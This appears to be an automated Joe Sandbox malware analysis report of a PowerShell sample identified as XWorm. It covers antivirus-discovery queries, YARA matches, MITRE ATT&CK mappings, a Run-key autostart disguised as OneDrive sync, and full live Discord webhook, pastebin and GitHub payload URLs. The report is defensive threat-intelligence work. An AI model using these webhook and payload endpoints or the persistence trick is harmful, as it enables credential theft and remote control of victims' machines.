              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.powershell.exe.1e877e60000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.powershell.exe.1e8602f8028.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5584, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.powershell.exe.1e877e60000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.powershell.exe.1e8602f8028.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5584, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
              Windows Management Instrumentation              		1
              Scheduled Task/Job              		11
              Process Injection              		1
              Masquerading              		1
              Input Capture              		241
              Security Software Discovery              		Remote Services1
              Input Capture              		1
              Web Service              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Scheduled Task/Job              		11
              Registry Run Keys / Startup Folder              		1
              Scheduled Task/Job              		141
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop Protocol11
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Native API              		1
              DLL Side-Loading              		11
              Registry Run Keys / Startup Folder              		11
              Process Injection              		Security Account Manager141
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive3
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login Hook1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture4
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Obfuscated Files or Information              		LSA Secrets2
              File and Directory Discovery              		SSHKeylogging115
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Software Packing              		Cached Domain Credentials24
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534105 Sample: cr_asm_hiddenz.ps1 Startdate: 15/10/2024 Architecture: WINDOWS Score: 100 59 pastebin.com 2->59 61 raw.githubusercontent.com 2->61 63 discord.com 2->63 75 Suricata IDS alerts for network traffic 2->75 77 Found malware configuration 2->77 79 Malicious sample detected (through community Yara rule) 2->79 83 13 other signatures 2->83 9 powershell.exe 1 31 2->9         started        14 forfiles.exe 1 2->14         started        16 forfiles.exe 2->16         started        signatures3 81 Connects to a pastebin service (likely for C&C) 59->81 process4 dnsIp5 69 discord.com 162.159.138.232, 443, 49712, 49722 CLOUDFLARENETUS United States 9->69 55 C:\Users\user\AppData\...\thvmfbzv.cmdline, Unicode 9->55 dropped 57 C:\ProgramData\...\BeginSync.lnk, MS 9->57 dropped 91 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 9->91 93 Suspicious powershell command line found 9->93 95 Tries to open files direct via NTFS file id 9->95 97 Powershell creates an autostart link 9->97 18 powershell.exe 20 9->18         started        22 csc.exe 3 9->22         started        25 conhost.exe 9->25         started        27 attrib.exe 1 9->27         started        29 powershell.exe 7 14->29         started        31 conhost.exe 1 14->31         started        33 powershell.exe 16->33         started        35 conhost.exe 16->35         started        file6 signatures7 process8 dnsIp9 65 45.144.31.105, 443, 49726, 49728 HQservCommunicationSolutionsIL United Kingdom 18->65 67 104.20.3.235, 443, 49724, 49725 CLOUDFLARENETUS United States 18->67 85 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->85 87 Binary or sample is protected by dotNetProtector 18->87 37 csc.exe 18->37         started        40 conhost.exe 18->40         started        53 C:\Users\user\AppData\Local\...\thvmfbzv.dll, PE32 22->53 dropped 42 cvtres.exe 1 22->42         started        89 Suspicious powershell command line found 29->89 44 powershell.exe 14 13 29->44         started        47 powershell.exe 33->47         started        file10 signatures11 process12 dnsIp13 51 C:\Users\user\AppData\Local\...\s4dvafav.dll, PE32 37->51 dropped 49 cvtres.exe 37->49         started        71 raw.githubusercontent.com 185.199.111.133, 443, 49713, 49714 FASTLYUS Netherlands 44->71 73 pastebin.com 172.67.19.24, 443, 49710, 49711 CLOUDFLARENETUS United States 44->73 file14 process15

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              discord.com
              		162.159.138.232
              		truetrue
                		unknown
                raw.githubusercontent.com
                		185.199.111.133
                		truetrue
                  		unknown
                  pastebin.com
                  		172.67.19.24
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://discord.com/api/webhooks/1286410676377489529/IzHkrSq-pjbL-xAImQ3lHIpYzCTAy9OyxtjHyAVpG4xY-CaU9vyM9tnzyvVTAKfrFOSGtrue
                      		unknown
                      https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txtfalse
                        		unknown
                        https://pastebin.com/raw/6db99fAKfalse
                          		unknown
                          http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
                            		unknown
                            http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txtfalse
                              		unknown
                              https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
                                		unknown
                                http://pastebin.com/raw/sA04Mwk2false
                                  		unknown
                                  https://pastebin.com/raw/sA04Mwk2false
                                    		unknown
                                    https://pastebin.com/raw/zNCj2Utmtrue
                                      		unknown
                                      https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2true
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1922208784.0000020AAA6A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1922208784.0000020AAA560000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://discord.compowershell.exe, 00000001.00000002.1897623908.0000020A9A769000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732B971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.00000188814AA000.00000004.00000800.00020000.00000000.sdmptrue
                                          		unknown
                                          https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_powershell.exe, 00000014.00000002.2161624477.0000018880B8D000.00000004.00000800.00020000.00000000.sdmptrue
                                            		unknown
                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1897623908.0000020A9A769000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQpowershell.exe, 0000000A.00000002.2088268444.000002732B06C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880B8D000.00000004.00000800.00020000.00000000.sdmptrue
                                              		unknown
                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1897623908.0000020A9A769000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://pastebin.com/raw/zNCj2Utm8epowershell.exe, 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E86081F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://go.micropowershell.exe, 00000001.00000002.1897623908.0000020A9B58C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732A9BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880508000.00000004.00000800.00020000.00000000.sdmptrue
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.microsoft.copowershell.exe, 00000001.00000002.1927649993.0000020AB2720000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2130172038.0000027342761000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://contoso.com/Licensepowershell.exe, 00000001.00000002.1922208784.0000020AAA560000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://contoso.com/Iconpowershell.exe, 00000001.00000002.1922208784.0000020AAA560000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://discord.com/powershell.exe, 0000000A.00000002.2088268444.000002732BAA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.00000188815DF000.00000004.00000800.00020000.00000000.sdmptrue
                                                      		unknown
                                                      http://discord.compowershell.exe, 00000001.00000002.1897623908.0000020A9AB67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732B971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.00000188814AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://crl.microWpowershell.exe, 0000000D.00000002.2817477632.000001E877C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1897623908.0000020A9A769000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://discord.com/api/webhooks/1286410676377489529/IzHkrSq-pjbL-xAImQ3lHIpYzCTAy9OyxtjHyAVpG4xY-Capowershell.exe, 00000001.00000002.1897623908.0000020A9AB62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1897623908.0000020A9A715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1897623908.0000020A9AB67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1897623908.0000020A9A769000.00000004.00000800.00020000.00000000.sdmp, cr_asm_hiddenz.ps1false
                                                              		unknown
                                                              https://discord.com/api/webhooks/128545359042878powershell.exe, 0000000A.00000002.2088268444.000002732B971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.00000188814AA000.00000004.00000800.00020000.00000000.sdmptrue
                                                                		unknown
                                                                https://0.discorpowershell.exe, 0000000A.00000002.2088268444.000002732BAA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.00000188815DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://raw.githubusercontent.compowershell.exe, 0000000A.00000002.2088268444.000002732AFD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E85F8B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880AF3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://contoso.com/powershell.exe, 00000001.00000002.1922208784.0000020AAA560000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1922208784.0000020AAA6A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1922208784.0000020AAA560000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://raw.githubusercontent.compowershell.exe, 0000000A.00000002.2088268444.000002732AFA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732AFD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880AF3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://go.microsoft.cpowershell.exe, 0000000A.00000002.2086833064.000002732873A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://go.microsoft.ctainpowershell.exe, 0000000A.00000002.2086833064.000002732873A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://aka.ms/pscore68powershell.exe, 00000001.00000002.1897623908.0000020A9A4F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732A50C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732A4F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E85F581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.000001888005D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.000001888004A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dllpowershell.exe, 00000001.00000002.1897623908.0000020A9A715000.00000004.00000800.00020000.00000000.sdmp, cr_asm_hiddenz.ps1false
                                                                            		unknown
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1897623908.0000020A9A4F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732A545000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E85F581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880084000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://0.discord.com/powershell.exe, 0000000A.00000002.2088268444.000002732BAA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.00000188815DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://pastebin.compowershell.exe, 0000000A.00000002.2088268444.000002732AF28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732AC54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732AF0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E86082B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E860856000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880A74000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://pastebin.compowershell.exe, 0000000A.00000002.2088268444.000002732AF16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E86082B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880A64000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                  		unknown

                                                                                  World Map of Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public IPs

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  104.20.3.235
                                                                                  		unknownUnited States
                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                  172.67.19.24
                                                                                  		pastebin.comUnited States
                                                                                  		13335CLOUDFLARENETUStrue
                                                                                  162.159.138.232
                                                                                  		discord.comUnited States
                                                                                  		13335CLOUDFLARENETUStrue
                                                                                  45.144.31.105
                                                                                  		unknownUnited Kingdom
                                                                                  		42994HQservCommunicationSolutionsILfalse
                                                                                  185.199.111.133
                                                                                  		raw.githubusercontent.comNetherlands
                                                                                  		54113FASTLYUStrue

                                                                                  General Information

                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1534105
                                                                                  Start date and time:2024-10-15 15:52:15 +02:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 7m 32s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:22
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:cr_asm_hiddenz.ps1
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.expl.evad.winPS1@27/29@4/5
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 66.7%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 90%
                                                                                  • Number of executed functions: 27
                                                                                  • Number of non-executed functions: 3
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .ps1

                                                                                  Warnings

                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Execution Graph export aborted for target powershell.exe, PID 316 because it is empty
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  • VT rate limit hit for: cr_asm_hiddenz.ps1

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  TimeTypeDescription
                                                                                  09:53:22API Interceptor1825994x Sleep call for process: powershell.exe modified
                                                                                  14:53:51AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                                  14:54:00AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  104.20.3.235BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                  • pastebin.com/raw/sA04Mwk2
                                                                                  sostener.vbsGet hashmaliciousNjratBrowse
                                                                                  • pastebin.com/raw/V9y5Q5vv
                                                                                  SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                                                                  • pastebin.com/raw/V9y5Q5vv
                                                                                  sostener.vbsGet hashmaliciousRemcosBrowse
                                                                                  • pastebin.com/raw/V9y5Q5vv
                                                                                  New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                                                                  • pastebin.com/raw/NsQ5qTHr
                                                                                  Invoice-883973938.jsGet hashmaliciousWSHRATBrowse
                                                                                  • pastebin.com/raw/NsQ5qTHr
                                                                                  2024 12_59_31 a.m..jsGet hashmaliciousWSHRATBrowse
                                                                                  • pastebin.com/raw/NsQ5qTHr
                                                                                  PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                                                                  • pastebin.com/raw/NsQ5qTHr
                                                                                  172.67.19.24BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                  • pastebin.com/raw/sA04Mwk2
                                                                                  cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                  • pastebin.com/raw/sA04Mwk2
                                                                                  steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                                  • pastebin.com/raw/sA04Mwk2
                                                                                  cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                  • pastebin.com/raw/sA04Mwk2
                                                                                  envifa.vbsGet hashmaliciousUnknownBrowse
                                                                                  • pastebin.com/raw/V9y5Q5vv
                                                                                  sostener.vbsGet hashmaliciousRemcosBrowse
                                                                                  • pastebin.com/raw/V9y5Q5vv
                                                                                  Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                                                                                  • pastebin.com/raw/NsQ5qTHr
                                                                                  Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                                                                                  • pastebin.com/raw/NsQ5qTHr
                                                                                  Dadebehring PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                                                                  • pastebin.com/raw/NsQ5qTHr
                                                                                  PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                                                                  • pastebin.com/raw/NsQ5qTHr

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  raw.githubusercontent.comBeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 185.199.111.133
                                                                                  gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 185.199.108.133
                                                                                  cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 185.199.110.133
